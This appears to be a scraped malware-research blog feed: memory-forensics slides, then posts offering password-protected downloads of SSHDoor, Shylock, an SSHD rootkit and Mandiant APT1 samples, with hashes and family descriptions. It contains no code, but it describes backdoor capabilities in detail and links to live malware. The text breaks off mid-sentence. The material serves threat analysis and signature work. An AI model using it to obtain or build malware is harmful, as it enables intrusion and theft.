======================== Memory Forensics * And you can also easily explore the registry, which is widely used by malcode writers for various purpose [e.g. to permit their code to survive reboot]. ======================== Memory Forensics * As well querying loaded drivers [often used by Rootkits]. ======================== Memory Forensics * You can even parse loaded libraries to detect API Hooking, also widely used by Rootkits. Here a trampoline has been placed in the wbemcomm DLL [to hook certain WMI queries]. ======================== Memory Forensics * You can extract suspicious file [through PID or offset] from the memory dump to carry out further investigation. ======================== Memory Forensics * And quickly identify a Key Logger. ======================== Memory Forensics * In fact, you can enumerate all opened files and even loaded DLL within a specific process… And drop them back on disk for investigation. ======================== Memory Forensics * The dumped process may not be runable, but would still offer you a quite easy to understand code [at least you don't have anymore to unpack it]. For example: strings dumpedfile | egrep -i 'http|ftp|irc|\.exe' * Even more powerful, you can rely on the MALFIND command to perform advanced search using Regex, Unicode or ANSI strings... * And most importantly, it permits to quickly find hidden or injected code through the VAD tree inspection [very useful in case of DLL which may have been unlinked from the LDR lists by the malcode loader in order to avoid its detection]. ======================== Memory Forensics * Here the MALFIND command reveals that an arbitrary code was injected into the CRSS.exe system process. ======================== Memory Forensics * We can quick parse MALFIND results to bring out running processes which were infected by such code injection. ======================== Memory Forensics * Even powerful rootkits quickly draw your attention. ======================== Memory Forensics * We can also use the Yara malware identification feature to directly scan for patterns inside a PID or within a specific memory segment. Here we see that an injected code inside the SVCHOST process established a connection to dexter.servequake.com:4444 via HTTP and download the 1234567890.functions resource. ======================== Memory Forensics * For sure, the RAT payload is encrypted, but in a few minutes you identified the threat and dig quite deeply into the real problem. ======================== Memory Forensics * You can now extract the guilty binary code along with the related memory segments and begin a classical malware analysis. ======================== Memory Forensics * And if you like high-level view for your incident report, why not extend Volatility with Graphviz to make something more visual? ======================== Memory Forensics * That’s it. I hope I have piqued your interest with one of the most important Forensics innovations of those last few years. The whole demo is attached here. * To learn more: SANS Forensics 610 Training Course [GREM] https://www.volatilesystems.com/default/volatility http://www.microsoft.com/whdc/system/platform/firmware/PECOFF.mspx http://www.ualberta.ca/CNS/RESEARCH/LinuxClusters/mem.html http://www.tenouk.com/visualcplusmfc/visualcplusmfc20.html ======================== Table of contents 0x00 - About me 0x01 - About this conference 0x02 - Memory introduction 0x03 - Memory manipulation from an offensive angle 0x04 - Memory manipulation from a defensive angle 0x05 - Conclusion ======================== Conclusion * I hope I have achieved my goal of opening the doors to a fascinating world which could easily allow security analysts to save lots of time during their recurrent duties… * …And that you will see your own system [and the ones you asses] from a different angle. * …And that you will now have the reflex of dumping the whole memory in case of incident. * …And that you will reconsider security when the physical aspect in concerned. :-] JAN 2013 - LINUX SSHDOOR - SAMPLE February 16, 2013, 6:13 pm Next Jan 2013 Shylock (skype version) sample Previous Manipulating Memory for Fun and Profit by Frédéric Bourla - High-Tech Bridge 0 0 Image may be NSFW. Clik here to view. Just a few accumulated samples here found and shared by others. This one is for Linux SSHDoor malware, which can steal your SSH passwords. ESET covered that in detail in Linux/SSHDoor.A Backdoored SSH daemon that steals passwords ( 24 JAN 2013) The related Linux.Chapro.A sample was posted earlier this year as well Download Image may be NSFW. Clik here to view.Download. Email me if you need the password Automatic Scans https://www.virustotal.com/en/file/ebfd9354ed83635ed38bd117b375903f9984a18780ef86dbf7a642fc6584271c/analysis/1361067116/ SHA256:ebfd9354ed83635ed38bd117b375903f9984a18780ef86dbf7a642fc6584271c SHA1:cb7a464aa8d58f26f6561c32ef4a1464c583a7ca MD5:90dc9de5f93b8cc2d70a1be37acea23a File size:469.9 KB ( 481200 bytes ) File name:90DC9DE5F93B8CC2D70A1BE37ACEA23A File type:ELF Detection ratio: 22 / 46 Analysis date: 2013-02-17 02:11:56 UTC ( 0 minutes ago ) Avast ELF:SSHDoor-A [Trj] 20130217 AVG BackDoor.Generic_c.FDN 20130216 ClamAV UNIX.Trojan.SSHDoor 20130217 Comodo UnclassifiedMalware 20130217 DrWeb Linux.BackDoor.Ssh 20130215 eSafe Win32.Trojan 20130211 ESET-NOD32 Linux/SSHDoor.A 20130216 F-Secure Backdoor:Linux/SSHDoor.A 20130217 Fortinet Linux/SSh.M!tr.bdr 20130217 GData ELF:SSHDoor-A 20130217 Ikarus Backdoor.Linux.SSh 20130216 Jiangmin Backdoor/Linux.gu 20130216 Kaspersky Backdoor.Linux.SSh.m 20130216 Microsoft Backdoor:Linux/SSHDoor.A 20130217 Norman SSHDoor.A 20130215 PCTools Malware.Linux-SSHDoor 20130217 Symantec Linux.SSHDoor 20130216 TrendMicro ELF_SSHDOOR.A 20130217 TrendMicro-HouseCall ELF_SSHDOOR.A 20130217 JAN 2013 SHYLOCK (SKYPE VERSION) SAMPLE February 16, 2013, 7:15 pm Next Linux/CentOS SSHd Spam Exploit — libkeyutils.so.1.9 - sample Previous Jan 2013 - Linux SSHDoor - sample 0 0 Image may be NSFW. Clik here to view. In January 2013, Iurii Khvyl and Peter Kruse from CSIS posted analysis of Shylock variant capable of spreading through Skype. You can read their research here Shylock calling Skype. The sample is below Download Image may be NSFW. Clik here to view.Download. Email me if you need the password Sample credit: anonymous Automatic scans https://www.virustotal.com/en/file/4bd97130a89c2f9080259d8e87d8d713a23fd0e4336eabb0bf47a44d700ec842/analysis/ SHA256:4bd97130a89c2f9080259d8e87d8d713a23fd0e4336eabb0bf47a44d700ec842 SHA1:b87948722e04fa3edda45303d20c745a6301e567 MD5:8fbeb78b06985c3188562e2f1b82d57d File size:278.0 KB ( 284672 bytes ) File name:4bd97130a89c2f9080259d8e87d8d713a23fd0e4336eabb0bf47a44d700ec842 File type:Win32 DLL Tags:pedll Detection ratio: 33 / 46 Analysis date: 2013-02-05 19:05:29 UTC ( 1 week, 4 days ago ) 31 91 AhnLab-V3 Win-Trojan/Caphaw.284672 20130205 AntiVir TR/Skyspy.AJ 20130205 Avast Win32:Shylock-A [Trj] 20130205 AVG Ransomer.BKE 20130205 BitDefender Trojan.Generic.8640212 20130205 CAT-QuickHeal Backdoor.Caphaw 20130205 ClamAV Win.Trojan.Shylock 20130205 Comodo UnclassifiedMalware 20130205 eSafe Win32.Trojan 20130204 ESET-NOD32 Win32/Caphaw.M 20130205 F-Secure Trojan:W32/Agent.DUIE 20130205 Fortinet W32/Shylock.A!tr 20130205 GData Trojan.Generic.8640212 20130205 Ikarus Trojan-Spy.Agent 20130205 Kaspersky Trojan.Win32.Agentb.hxk 20130204 Malwarebytes Trojan.Shylock 20130205 McAfee RDN/Generic.dx!i 20130205 McAfee-GW-Edition RDN/Generic.dx!i 20130205 Microsoft Backdoor:Win32/Caphaw.N 20130205 MicroWorld-eScan Trojan.Generic.8640212 20130205 NANO-Antivirus Trojan.Win32.Caphaw.bevzou 20130205 Norman Shylock.C 20130205 nProtect Trojan.Generic.8640212 20130205 Panda Trj/CI.A 20130205 PCTools Trojan.Generic 20130205 Rising Backdoor.Caphaw!4ED7 20130205 Sophos Troj/Shype-A 20130205 Symantec Trojan Horse 20130205 TheHacker Trojan/Caphaw.gen 20130205 TrendMicro WORM_KEPSY.A 20130205 TrendMicro-HouseCall WORM_KEPSY.A 20130205 VIPRE Trojan.Win32.Generic!BT 20130205 ViRobot Backdoor.Win32.S.Shylock.284672 20130205 LINUX/CENTOS SSHD SPAM EXPLOIT — LIBKEYUTILS.SO.1.9 - SAMPLE February 20, 2013, 1:39 pm Next Mandiant APT1 samples categorized by malware families Previous Jan 2013 Shylock (skype version) sample 0 0 Image may be NSFW. Clik here to view. Someone shared a sample of the Linux rootkit affecting servers running CloudLinux, CentOS & cPanel. Here are the links: * Feb 20-18 - Webhostingtalk SSHD Rootkit Rolling around * Feb 18, 2013 0day Linux/CentOS SSHd Spam Exploit — libkeyutils.so.1.9 http://blog.solidshellsecurity.com/ * Feb 8, 2013 SSHD Spam Rootkit /lib64/libkeyutils.so.1.9 Download Image may be NSFW. Clik here to view.Download. Email me if you need the password Sample credit: anonymous Automatic scans https://www.virustotal.com/en/file/afbef5352942dde22e5cfa802c057917fccb17623f3e8ead165fd17371d851f3/analysis/ SHA256:afbef5352942dde22e5cfa802c057917fccb17623f3e8ead165fd17371d851f3 SHA1:471ee431030332dd636b8af24a428556ee72df37 MD5:ecea5cc15532ffac4b8159bf860c63c1 File size:27.7 KB ( 28352 bytes ) FIRST SEEN BY VIRUSTOTAL 2013-02-19 14:14:30 UTC ( 1 day, 7 hours ago ) LAST SEEN BY VIRUSTOTAL 2013-02-20 18:03:38 UTC ( 3 hours, 57 minutes ago ) FILE NAMES (MAX. 25) 1. vti-rescan 2. libkeyutils.so.1.9 File type:ELF Detection ratio: 3 / 46 Analysis date: 2013-02-20 18:03:38 UTC AVG Patched_c.NCO 20130220 DrWeb Linux.Sshdkit.1 20130220 ESET-NOD32 Linux/SSHDoor.B 20130220 MANDIANT APT1 SAMPLES CATEGORIZED BY MALWARE FAMILIES March 3, 2013, 8:46 pm Next DarkSeoul - Jokra - MBR wiper samples Previous Linux/CentOS SSHd Spam Exploit — libkeyutils.so.1.9 - sample 0 0 Image may be NSFW. Clik here to view.These are the samples described in the Mandiant Report APT1, in the Indicators of Compromise (IOCs). Each file is named according to the malware family, so you can run your own detection and signature tools to see how your naming convention corresponds to the one used by Mandiant. You can use these binaries to develop signatures, compare to your samples, or study the behavior and evolution of APT1. I added Contagio samples in several families as well. The list of binaries and their names, as well as malware families descriptions are provided below for your convenience. Download Image may be NSFW. Clik here to view.Download Mandiant report samples. Email me if you need the password Download Contagio samples (Bangat, Mapiget, Kurton, Bicuit, Letsgo) Download additional samples for GCal, GDocupload, Manitsme Sample list and information Below descirptions are from Mandiant IOC http://intelreport.mandiant.com/Mandiant_APT1_Report_Appendix.zip Image may be NSFW. Clik here to view. 1. AURIGA The AURIGA malware family shares a large amount of functionality with the BANGAT backdoor. The malware family contains functionality for keystroke logging, creating and killing processes, performing file system and registry modifications, spawning interactive command shells, performing process injection, logging off the current user or shutting down the local machine. The AURIGA malware contains a driver component which is used to inject the malware DLL into other processes. This driver can also perform process and IP connection hiding. The malware family will create a copy of cmd.exe to perform its C2 activity, and replace the "Microsoft corp" strings in the cmd.exe binary with different values. The malware family typically maintains persistence through installing itself as a service. > AURIGA_sample_6B31344B40E2AF9C9EE3BA707558C14E > AURIGA_sample_CDCD3A09EE99CFF9A58EFEA5CCBE2BED 2. BANGAT The BANGAT malware family shares a large amount of functionality with the AURIGA backdoor. The malware family contains functionality for keylogging, creating and killing processes, performing filesystem and registry modifications, spawning interactive command shells, performing process injection, logging off the current user or shutting down the local machine. In addition, the malware also implements a custom VNC like protocol which sends screenshots of the desktop to the C2 server and accepts keyboard and mouse input. The malware communicates to its C2 servers using SSL, with self signed SSL certificates. The malware family will create a copy of cmd.exe to perform its C2 activity, and replace the "Microsoft corp" strings in the cmd.exe binary with different values. The malware family typically maintains persistence through installing itself as a service. > BANGAT_sample_4C6BDDCCA2695D6202DF38708E14FC7E > BANGAT_sample_8E8622C393D7E832D39E620EAD5D3B49 > BANGAT_sample_468FF2C12CFFC7E5B2FE0EE6BB3B239E > BANGAT_sample_727A6800991EEAD454E53E8AF164A99C > BANGAT_sample_BD8B082B7711BC980252F988BB0CA936 > BANGAT_sample_DB05DF0498B59B42A8E493CF3C10C578 > BANGAT_sample_E1B6940985A23E5639450F8391820655 > BANGAT_sample_EF8E0FB20E7228C7492CCDC59D87C690 Contagio samples for Bangat Circa 2009-2010 995B44EF8460836D9091A8B361FDE489_rasauto32.dll F10D145684BA6C71CA2D2F7EB0D89343_rasauto32.dll 43CE605B2584C27064FEBB0474A787A4_irmon32.dll 1966B265272E1660E6F340B19A7E5567_irmon32.dll 423A30C077B12354A4A5C31D4DE99689_irmon32.dll 80CA8B948409138BE40FFBC5D6D95EF1_rasauto16.dll 15138604260B1D27F92BF1EC6468B326_rasauto16.dll 616B0F00DE54D7501CEEE18823F72103_rasauto16.dll C75D351D86DE26718A3881F62FDDDE99_irmon32.dll E66DD357A6DFA6EBD15358E565E8F00F_irmon32.dll 0F77AF7FA673F5B3D36B926576002A1C_winhlp32.exe 3. BISCUIT BISCUIT provides attackers with full access to an infected host. BISCUIT capabilities include launching an interactive command shell, enumerating servers on a Windows network, enumerating and manipulating process, and transferring files. BISCUIT communicates using a custom protocol, which is then encrypted using SSL. Once installed BISCUIT will attempt to beacon to its command/control servers approximately every 10 or 30 minutes. It will beacon its primary server first, followed by a secondary server. All communication is encrypted with SSL (OpenSSL 0.9.8i). > BISCUIT_sample_5A728CB9CE56763DCCB32B5298D0F050 > BISCUIT_sample_5D8129BE965FAB8115ECA34FC84BD7F0 > BISCUIT_sample_7CB055AC3ACBF53E07E20B65EC9126A1 > BISCUIT_sample_12F25CE81596AEB19E75CC7EF08F3A38 > BISCUIT_sample_43B844C35E1A933E9214588BE81CE772 > BISCUIT_sample_70A55FDC712C6E31E013E6B5D412B0D6 > BISCUIT_sample_268EEF019BF65B2987E945AFAF29643F > BISCUIT_sample_15901DDBCCC5E9E0579FC5B42F754FE8 > BISCUIT_sample_034374DB2D35CF9DA6558F54CEC8A455 > BISCUIT_sample_DA383CC098A5EA8FBB87643611E4BFB6 Contagio samples for 03B3CCEB253FD782590CF0EFAFD49D5F_AcroRD32.exe 8AA320A3D34CF89EF63BF801DD497490_qmqrproxy.dll 4. BOUNCER BOUNCER will load an extracted DLL into memory, and then will call the DLL's dump export. The dump export is called with the parameters passed via the command line to the BOUNCER executable. It requires at least two arguments, the IP and port to send the password dump information. It can accept at most five arguments, including a proxy IP, port and an x.509 key for SSL authentication. The DLL backdoor has the capability to execute arbitrary commands, collect database and server information, brute force SQL login credentials, launch arbitrary programs, create processes and threads, delete files, and redirect network traffic. > BOUNCER_sample_6EBD05A02459D3B22A9D4A79B8626BF1 > BOUNCER_sample_57353ECBAECE29ECAF8025231EB930E3 > BOUNCER_sample_CF038194F0FE222F31EC24CB80941BB1 > BOUNCER_sample_D2F1BE7E10ED39AA8BC0F7F671D824D2 > BOUNCER_sample_F90DA15F862BB8452FC51D3F0DBB3373 5. CALENDAR This family of malware uses Google Calendar to retrieve commands and send results. It retrieves event feeds associated with Google Calendar, where each event contains commands from the attacker for the malware to perform. Results are posted back to the event feed. The malware authenticates with Google using the hard coded email address and passwords. The malware uses the deprecated ClientLogin authentication API from Google. The malware is registered as a service dll as a persistence mechanism. Artifacts of this may be found in the registry. GCAL_sample_72d4be67abeaa6ab3827784317b1b7e9 6. COMBOS The COMBOS malware family is an HTTP based backdoor. The backdoor is capable of file upload, file download, spawning a interactive reverse shell, and terminating its own process. The backdoor may decrypt stored Internet Explorer credentials from the local system and transmit the credentials to the C2 server. The COMBOS malware family does not have any persistence mechanisms built into itself. > COMBOS_sample_1E3719BBF854417384A3768E4326584BCOMBOS_sample_ > EC1E62EF73D844C6C845ACDD4C1F9CE7 > COMBOS_sample_FA14D823A5D1854131DB0DC9EEF27022 7 COOKIEBAG aka TROJAN.COOKIES http://www.cyberengineeringservices.com/trojan-cookies/ his family of malware is a backdoor capable of file upload and download as well as providing remote interactive shell access to the compromised machine. Communication with the Command & Control (C2) servers uses a combination of single-byte XOR and Base64 encoded data in the Cookie and Set-Cookie HTTP header fields. Communication with the C2 servers is over port 80. Some variants install a registry key as means of a persistence mechanism. The hardcoded strings cited include a string of a command in common with several other APT1 families. > COOKIEBAG_sample_0C28AD34F90950BC784339EC9F50D288 > COOKIEBAG_sample_321D75C9990408DB812E5A248A74F8C8 > COOKIEBAG_sample_543E03CC5872E9ED870B2D64363F518B > COOKIEBAG_sample_989B797C2A63FBFC8E1C6E8A8CCD6204 > COOKIEBAG_sample_57326CD78A56D26E349BBD4BCC5B9FA2 > COOKIEBAG_sample_DB2580F5675F04716481B24BB7AF468E > COOKIEBAG_sample_F3611C5C793F521F7FF2A69C22D4174E 7 DAIRY Members of this malware family are backdoors that provide file downloading, process listing, process killing, and reverse shell capabilities. This malware may also add itself to the Authorized Applications list for the Windows Firewall. > DAIRY_sample_995442F722CC037885335340FC297EA0 8. GETMAIL Members of this family of malware are utilities designed to extract email messages and attachments from Outlook PST files. One part of this utility set is an executable, one is a dll. The malware may create a registry artifact related to the executable. > GETMAIL_sample_909BEF6DB8D33854E983EBCCDD71419F > GETMAIL_sample_E81DB0198D2A63C4CCFC33F58FCB821E > GETMAIL_sample_E212AAF642D73A2E4A885F12EEA86C58 9. GDOCUPLOAD This family of malware is a utility designed to upload files to Google Docs. Nearly all communications are with docs.google.com are SSL encrypted. The malware does not use Google's published API to interact with their services. The malware does not currently work with Google Docs. It does not detect HTTP 302 redirections and will get caught in an infinite loop attempting to parse results from Google that are not present. > GDOCUPLOAD-sample_232d1be2d8cbbd1cf57494a934628504 10 GLOOXMAIL - aka TROJAN.GTALK http://www.cyberengineeringservices.com/trojan-gtalk/ GLOOXMAIL communicates with Google's Jabber/XMPP servers and authenticates with a hard-coded username and password. The malware can accept commands over XMPP that includes file upload and download, provide a remote shell, sending process listings, and terminating specified processes. The malware makes extensive use of the open source gloox library (http://camaya.net/gloox/, version 0.9.9.12) to communicate using the Jabber/XMPP protocol. All communications with the Google XMPP server are encrypted. > GLOOXMAIL_sample_3DE1BD0F2107198931177B2B23877DF4 > GLOOXMAIL_sample_15A33F8FE11B94BDD38BFF651F6A5CD1 11 GOGGLES - AKA TROJAN.FOXY http://www.cyberengineeringservices.com/trojan-foxy-des/ A family of downloader malware, that retrieves an encoded payload from a fixed location, usually in the form of a file with the .jpg extension. Some variants have just an .exe that acts as a downloader, others have an .exe launcher that runs as a service and then loads an associated .dll of the same name that acts as the downloader. This IOC is targeted at the downloaders only. After downloading the file, the malware decodes the downloaded payload into an .exe file and launches it. The malware usually stages the files it uses in the %TEMP% directory or the %WINDIR%\Temp directory. > GOGGLES_sample_09D372E4259980AC95FDADF1846578D9 > GOGGLES_sample_57F98D16AC439A11012860F88DB21831 > GOGGLES_sample_51326BF40DA5A5357A143DD9A6E6A11C > GOGGLES_sample_A5B581C0600815B1112CA2FED578928B > GOGGLES_sample_BCB087F69792B69494A3EDAD51A842BB > GOGGLES_sample_BF80DBF969B73790253F683CD723FD71 > GOGGLES_sample_DB50416D9E67F4982E89E0FFB0ADE6F3 12 GREENCAT Members of this family are full featured backdoors that communicates with a Web-based Command & Control (C2) server over SSL. Features include interactive shell, gathering system info, uploading and downloading files, and creating and killing processes, Malware in this family usually communicates with a hard-coded domain using SSL on port 443. Some members of this family rely on launchers to establish persistence mechanism for them. Others contains functionality that allows it to install itself, replacing an existing Windows service, and uninstall itself. Several variants use %SystemRoot%\Tasks or %WinDir%\Tasks as working directories, additional malware artifacts may be found there. > GREENCAT_sample_0C5E9F564115BFCBEE66377A829DE55F > GREENCAT_sample_1F92FF8711716CA795FBD81C477E45F5 > GREENCAT_sample_3E6ED3EE47BCE9946E2541332CB34C69 > GREENCAT_sample_3E69945E5865CCC861F69B24BC1166B6 > GREENCAT_sample_5AEAA53340A281074FCB539967438E3F > GREENCAT_sample_6D2320AF561B2315C1241E3EFD86067F > GREENCAT_sample_30E78D186B27D2023A2A7319BB679C3F > GREENCAT_sample_36C0D3F109AEDE4D76B05431F8A64F9E > GREENCAT_sample_55FB1409170C91740359D1D96364F17B > GREENCAT_sample_57E79F7DF13C0CB01910D0C688FCD296 > GREENCAT_sample_120C2E085992FF59A21BA401EC29FEC9_different > GREENCAT_sample_390D1F2A620912104F53C034C8AEF14B > GREENCAT_sample_871CC547FEB9DBEC0285321068E392B8 > GREENCAT_sample_7388D67561D0A7989202AD4D37EFF24F > GREENCAT_sample_A99E06E2F90DB4E506EF1347A8774DD5 > GREENCAT_sample_A565682D8A13A5719977223E0D9C7AA4 > GREENCAT_sample_AB208F0B517BA9850F1551C9555B5313 > GREENCAT_sample_B3BC979D8DE3BE09728C5DE1A0297C4B > GREENCAT_sample_B5E9CE72771217680EFAEECFAFE3DA3F > GREENCAT_sample_B8F61242E28F2EDF6CB1BE8781438491 > GREENCAT_sample_BA0C4D3DBF07D407211B5828405A9B91 > GREENCAT_sample_C044715C2626AB515F6C85A21C47C7DD > GREENCAT_sample_E54CE5F0112C9FDFE86DB17E85A5E2C5 > GREENCAT_sample_E83F60FB0E0396EA309FAF0AED64E53F > GREENCAT_sample_F4ED3B7A8A58453052DB4B5BE3707342 > GREENCAT_sample_FAB6B0B33D59F393E142000F128A9652 13. HACKFASE This family of malware is a backdoor that provides reverse shell, process creation, system statistics collection, process enumeration, and process termination capabilities. This family is designed to be a service DLL and does not contain an installation mechanism. It usually communicates over port 443. Some variants use their own encryption, others use SSL. > HACKFASE_sample_0D0240672A314A7547D328F824642DA8 > HACKFASE_sample_1A0C7E61BCC50D57B7BCF9D9AF691DE5 > HACKFASE_sample_9E860622FEE66074DFE81DCFCC40C4E2 > HACKFASE_sample_17199DDAC616938F383A0339F416C890 > HACKFASE_sample_BCBDEF1678049378BE04719ED29078D2 14. HELAUTO This family of malware is designed to operate as a service and provides remote command execution and file transfer capabilities to a fixed IP address or domain name. All communication with the C2 server happens over port 443 using SSL. This family can be installed as a service DLL. Some variants allow for uninstallation. > HELAUTO_sample_47E7F92419EB4B98FF4124C3CA11B738 > HELAUTO_sample_DA6B0EE7EC735029D1FF4FA863A71DE8 15. KURTON This family of malware is a backdoor that tunnels its connection through a preconfigured proxy. The malware communicates with a remote command and control server over HTTPS via the proxy. The malware installs itself as a Windows service with a service name supplied by the attacker but defaults to IPRIP if no service name is provided during install. No Mandiant samples available. These are Contagio samples dated 2009 57C69FECFECDCB5288687DF2AC96E44F_iprinp.dll 7C136A9E8D94BF117288D9B5388019D6_iprinp.dll 82C39E6979022E57B93B719793B39A30_iprinp.dll A327B9D97CA479B89297F438F87816A0_iprinp.dll A6C1595BD7B1A85C42FBD674460DC35D_iprinp.dll 15. LIGHTBOLT LIGHTBOLT is a utility with the ability to perform HTTP GET requests for a list of user-specified URLs. The responses of the HTTP requests are then saved as MHTML files, which are added to encrypted RAR files. LIGHTBOLT has the ability to use software certificates for authentication. > LIGHTBOLT_sample_2E86A9862257A0CF723CEEF3868A1A12 16 LIGHTDART LIGHTDART is a tool used to access a pre-configured web page that hosts an interface to query a database or data set. The tool then downloads the results of a query against that web page to an encrypted RAR file. This RAR file (1.rar) is renamed and uploaded to an attacker controlled FTP server, or uploaded via an HTTP POST with a .jpg extension. The malware will execute this search once a day. The target webpage usually contains information useful to the attacker, which is updated on a regular basis. Examples of targeted information include weather information or ship coordinates. No samples 17. LONGRUN LONGRUN is a backdoor designed to communicate with a hard-coded IP address and provide the attackers with a custom interactive shell. It supports file uploads and downloads, and executing arbitrary commands on the compromised machine. When LONGRUN executes, it first loads configuration data stored as an obfuscated string inside the PE resource section. The distinctive string thequickbrownfxjmpsvalzydg is used as part of the input to the decoding algorithm. When the configuration data string is decoded it is parsed and treated as an IP and port number. The malware then connects to the host and begins interacting with it over a custom protocol. No samples 18. MANITSME This family of malware will beacon out at random intervals to the remote attacker. The attacker can run programs, execute arbitrary commands, and easily upload and download files. This IOC looks for both the dropper file and the backdoor. > MANITSME_sample_e97ebb5b2050b86999c55797c2348ba7 19. MAPIGET as seen here http://contagiodump.blogspot.com/2010/06/these-days-i-see-spike-in-number-of.html This malware utility is a set of two files that operate in conjunction to extract email messages and attachments from an Exchange server. In order to operate successfully, these programs require authentication credentials for a user on the Exchange server, and must be run from a machine joined to the domain that has Microsoft Outlook installed (or equivalent software that provides the Microsoft 'Messaging API' (MAPI) service). > MAPIGET_sample_C627E595C9EC6DC2199447AEAB59AC03 > MAPIGET_sample_F3C6C797EF80787E6CBEEAA77496A3CB Contagio samples for MAPIGET 09E25BB934D8523FCCD27B86FBF4F8CE_m.exe C57902ACE7FF4173AE41F1292EA85E2A_MAPI.exe 20. MINIASP This family of malware consists of backdoors that attempt to fetch encoded commands over HTTP. The malware is capable of downloading a file, downloading and executing a file, executing arbitrary shell commands, or sleeping a specified interval. > MINIASP_77FBFED235D6062212A3E43211A5706E > MINIASP_81B03CBCFC4B9D090CD8F5E5DA816895 > MINIASP_E476E4A24F8B4FF4C8A0B260AA35FC9F 21 NEWSREELS The NEWSREELS malware family is an HTTP based backdoor. When first started, NEWSREELS decodes two strings from its resources section. These strings are both used as C2 channels, one URL is used as a beacon URL (transmitting) and the second URL is used to get commands (receiving). The NEWSREELS malware family is capable of performing file uploads, downloads, creating processes or creating an interactive reverse shell. > NEWSREELS_sample_02C65973B6018F5D473D701B3E7508B2 > NEWSREELS_sample_2C49F47C98203B110799AB622265F4EF > NEWSREELS_sample_270D42F292105951EE81E4085EA45054 > NEWSREELS_sample_0496E3B17CF40C45F495188A368C203A > NEWSREELS_sample_523F56515221161579EE6090C962E5B1 > NEWSREELS_sample_933B11BC4799F8D9F65466FB2E3EA659 > NEWSREELS_sample_A2CD1189860B9BA214421AAB86ECBC8A > NEWSREELS_sample_A639F598D4C0B9AA7A4691D05F27D977 > NEWSREELS_sample_AF2F7B070245C90BD2A0A0845314173A > NEWSREELS_sample_B8277CCE81E0A372BC35D33A0C9483C2 > NEWSREELS_sample_BAABD9B76BFF84ED27FD432CFC6DF241 > NEWSREELS_sample_D4C7F1F80883412F9796F1270ACCFF50 > NEWSREELS_sample_D271AE0F4E9230AF3B61EAFE7F671FDE > NEWSREELS_sample_EF6C375E3E6930E2B50E1E97FE6FBCC9 22. SEASALT The SEASALT malware family communicates via a custom binary protocol. It is capable of gathering some basic system information, file system manipulation, file upload and download, process creation and termination, and spawning an interactive reverse shell. The malware maintains persistence by installing itself as a service. > SEASALT_sample_5E0DF5B28A349D46AC8CC7D9E5E61A96 > SEASALT_sample_F0726AADCF5D66DAF528F79BA8507113 23. STARSYPOUND STARSYPOUND provides an interactive remote shell over an obfuscated communications channel. When it is first run, it loads a string (from the executable PE resource section) containing the beacon IP address and port. The malware sends the beacon string "*(SY)# <HOSTNAME>" to the remote system, where <HOSTNAME> is the hostname of the victim system. The remote host responds with a packet that also begins with the string "*(SY)# cmd". This causes the malware to launch a new cmd.exe child process. Further communications are forwarded to the cmd.exe child process to execute. The commands sent to the shell and their responses are obfuscated when sent over the network. > STARSYPOUND_sample_2BA0D0083976A5C1E3315413CDCFFCD2STARSYPOUND_sample_2DD892986B2249B5214639ECC8AC0223STARSYPOUND_sample_8B75BCBFF174C25A0161F30758509A44STARSYPOUND_sample_9EA3C16194CE354C244C1B74C46CD92ESTARSYPOUND_sample_6576C196385407B0F7F4B1B537D88983STARSYPOUND_sample_C0A33A1B472A8C16123FD696A5CE5EBBSTARSYPOUND_sample_CA6FE7A1315AF5AFEAC2961460A80569STARSYPOUND_sample_D9FBF759F527AF373E34673DC3ACA462STARSYPOUND_sample_EC8AA67B05407C01094184C33D2B5A44 24. SWORD This family of malware provides a backdoor over the network to the attackers. It is configured to connect to a single host and offers file download over HTTP, program execution, and arbitrary execution of commands through a cmd.exe instance. > SWORD_sample_052F5DA1734464A985DCD669BFF62F93 25. TABMSGSQL aka TROJAN LETSGO http://www.cyberengineeringservices.com/trojan-letsgo-analysis/ This malware family is a full-featured backdoor capable of file uploading and downloading, arbitrary execution of programs, and providing a remote interactive command shell. All communications with the C2 server are sent over HTTP to a static URL, appending various URL parameters to the request. Some variants use a slightly different URL. > TABMSGSQL_sample_001DD76872D80801692FF942308C64E6 > TABMSGSQL_sample_2F930D92DC5EBC9D53AD2A2B451EBF65 > TABMSGSQL_sample_3E87051B1DC3463F378C7E1FE398DC7D > TABMSGSQL_sample_8A86DF3D382BFD1E4C4165F4CACFDFF8 > TABMSGSQL_sample_052EC04866E4A67F31845D656531830D > TABMSGSQL_sample_002325A0A67FDED0381B5648D7FE9B8E > TABMSGSQL_sample_55886D571C2A57984EA9659B57E1C63A Contagio sample for TABMSDSQL - LETSGO DC1286AAC46B0EAD7B27F045E5B09EFF Conference Materials.zip (dropper) 26. TARSIP-ECLIPSE The TARSIP malware family is a backdoor which communicates over encoded information in HTTPS headers. Typical TARSIP malware samples will only beacon out to their C2 servers if the C2 DNS address resolves to a specific address. The capability of TARSIP backdoors includes file uploading, file downloading, interactive command shells, process enumeration, process creation, process termination. The TARSIP-ECLIPSE family is distinguished by the presence of 'eclipse' in .pdb debug strings present in the malware samples. It does not provide a built in mechanism to maintain persistence. > TARSIP-ECLIPSE_sample_0B506C6DDE8D07F9EEB82FD01A6F97D4 > TARSIP-ECLIPSE_sample_4A54D7878D4170C3D4E3C3606365C42C > TARSIP-ECLIPSE_sample_4F763B07A7B8A80F1F9408E590F79532 > TARSIP-ECLIPSE_sample_3107DE21E480AB1F2D67725F419B28D0 > TARSIP-ECLIPSE_sample_8934AEED5D213FE29E858EEE616A6EC7 > TARSIP-ECLIPSE_sample_123505024F9E5FF74CB6AA67D7FCC392 > TARSIP-ECLIPSE_sample_CA327BC83FBE38B3689CD1A5505DFC33 27. TARSIP-MOON The TARSIP malware family is a backdoor which communicates over encoded information in HTTPS headers. Typical TARSIP malware samples will only beacon out to their C2 servers if the C2 DNS address resolves to a specific address. The capability of TARSIP backdoors includes file uploading, file downloading, interactive command shells, process enumeration, process creation, process termination. The TARSIP-MOON family is distinguished by the presence of 'moon' in .pdb debug strings present in the malware samples. It does not provide a built in mechanism to maintain persistence. > TARSIP-MOON_sample_2BD02B41817D227058522CCA40ACD390 > TARSIP-MOON_sample_95F25D3AFC5370F5D9FD8E65C17D3599 > TARSIP-MOON_sample_0908D8B3E459551039BADE50930E4C1B > TARSIP-MOON_sample_6808EC6DBB23F0FA7637C108F44C5C80 > TARSIP-MOON_sample_A5D4EBC0285F0213E0C29D23BC410889 > TARSIP-MOON_sample_C91EACAB7655870764D13BA741AA9A73 28. WARP The WARP malware family is an HTTP based backdoor written in C++, and the majority of its code base is borrowed from source code available in the public domain. Network communications are implemented using the same WWW client library (w3c.cpp) available from www.dankrusi.com/file_69653F3336383837.html. The malware has system survey functionality (collects hostname, current user, system uptime, CPU speed, etc.) taken directly from the BO2K backdoor available from 